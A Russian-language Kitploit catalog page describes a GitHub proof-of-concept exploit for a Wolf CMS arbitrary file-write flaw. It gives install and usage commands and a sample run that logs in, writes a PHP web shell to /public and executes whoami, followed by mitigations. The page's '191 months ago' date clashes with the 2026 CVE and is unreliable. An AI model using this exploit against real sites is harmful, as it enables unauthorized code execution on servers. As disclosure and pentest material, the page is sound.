Skip to content
KitploitKITPLOIT
ИнструментыЭксплойтыБлог
Log in
Отправить
ИнструментыЭксплойтыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-67206 — PoC-эксплойт для Wolf CMS <= 0.8.3.1: выполняет аутентификацию в панели администратора, записывает произвольный PHP-файл в /public через FileManagerController и выполняет команды через веб-шелл. | Kitploit
Инструменты/GitHubGitHub/anirbala98/cve-2026-67206
ЭксплуатацияЭксплуатация веб-приложенийПост-эксплуатацияТестирование на ПроникновениеОбучение и ОбразованиеРазработка Полезной Нагрузки
GitHubanirbala98/cve-2026-67206

CVE-2026-67206

PoC-эксплойт для Wolf CMS <= 0.8.3.1: выполняет аутентификацию в панели администратора, записывает произвольный PHP-файл в /public через FileManagerController и выполняет команды через веб-шелл.

Репозиторий
191 месяц назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2026-67206 - Wolf CMS <= 0.8.3.1 - RCE через произвольную запись файлов

Этот репозиторий содержит Proof of Concept (PoC) эксплойт для CVE-2026-67206

Дисклеймер

Этот проект предоставлен только для образовательных целей и авторизованного тестирования безопасности. Не используйте его против систем, которыми вы не владеете или на тестирование которых у вас нет разрешения.

Обзор

Уязвимость произвольной записи файлов существует в версиях Wolf CMS до 0.8.3.1 включительно. Она позволяет аутентифицированному злоумышленнику записывать вредоносные произвольные файлы в каталог /public корня веб-сервера через функции create_file() и save() в FileManagerController.php. Функция create_file() в FileManagerController.php не проверяет расширения файлов, что позволяет аутентифицированным злоумышленникам записывать вредоносные PHP-скрипты и получать привилегии удалённого выполнения кода.

Подробный разбор с анализом исходного кода и демонстрацией эксплойта можно найти в моём блоге на Medium.

Затронутая версия

Затронуты все версии Wolf CMS до 0.8.3.1 включительно. Репозиторий Wolf CMS был заархивирован 28 августа 2021 года и больше не поддерживается активно. На данный момент патчей для этой уязвимости не существует.

Требования

  • Python 3.13.14
  • Requests 2.32.5
  • Beautifulsoup4 4.15.0

Установка

git clone https://github.com/anirbala98/CVE-2026-67206.git
cd CVE-2026-67206/
pip install -r requirements.txt

Использование

python exploit.py <base_url> -u <username> -p <password>
python exploit.py http://127.0.0.1:8080/ -u admin -p admin

Пример

└─$ python exploit.py http://127.0.0.1:8080/ -u admin -p 12966cc814K 
[*] Logging in with provided credentials...
[+] Login successful

[*] Creating a file named shell.php...
[+] File creation successful

[*] Attempting to write payload to shell.php...
[+] Payload written successfully!
[+] Web shell can be accessed with 'cmd' query string at http://127.0.0.1:8080/public/shell.php
[+] Testing output of http://127.0.0.1:8080/public/shell.php?cmd=whoami
www-data

Меры по смягчению

  • Проверяйте расширения файлов, создаваемых аутентифицированными пользователями, на основе белого списка
  • Запрещайте такие расширения, как .php, .phtml, .phar, .php5 и т. д., если в них нет необходимости
  • Запретите выполнение PHP в каталогах загрузки корня веб-сервера
  • По возможности сохраняйте создаваемые файлы на отдельном сервере, чтобы минимизировать последствия

Ссылки

  • https://www.tenable.com/cve/CVE-2026-67206
  • https://github.com/Caycon/cve-advisories/blob/main/2026/WolfCms/CVE-2026-67206.md
  • https://anirbala98.medium.com/from-source-code-to-exploit-understanding-cve-2026-67206-0ad3ae08bc78
Скачать инструмент